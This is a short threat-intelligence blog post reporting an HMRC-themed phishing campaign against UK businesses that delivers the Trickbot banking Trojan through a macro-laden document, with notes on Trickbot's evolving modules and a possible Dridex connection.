HMRC-themed emails carry Trickbot infection


Thought Leadership

HMRC-themed emails carry Trickbot infection

Troy Gill

A cybercrime group is currently targeting businesses in the UK with malware-laden emails containing the banking Trojan known as Trickbot.

In the past years, several malware families have been seen heavily targeting the UK in attempts to spread banking Trojans looking to gain access to business and personal accounts.

The messages - which states there has been an error in processing a payment - pose as legitimate communication from the HMRC.

Here is a look at the attack:


The messages contain a VBA macro which executes when the document is opened. The payload calls Powershell to drop a PE file, identified as Trickbot, from a compromised Web server in the US.

Trickbot has been receiving consistent upgrades over its lifecycle. It was seen leveraging the Eternal Blue exploit not long after Wannacry had such success spreading via its use. Late last year, it was updated with modules to target cryptocurrency wallets such as Coinbase. More recently it was updated with a module to encrypt targeted systems thus adding Ransomware to its repertoire. This evolution shows an effort on the part of the distributors to vary their business model to what works best to maximize their return per infection.

Additionally, the malware establishes a connection to a Russian-based IP that has been associated with Dridex activity. Dridex, which has evolved over the years from Zeus and Cridex, also is commonly used to target/compromise UK businesses for the purpose financial fraud. Might there be some connection to the groups operating these malware families? Or perhaps they have some shared infrastructure.


Like us today on FacebookTwitter, LinkedIn and YouTube.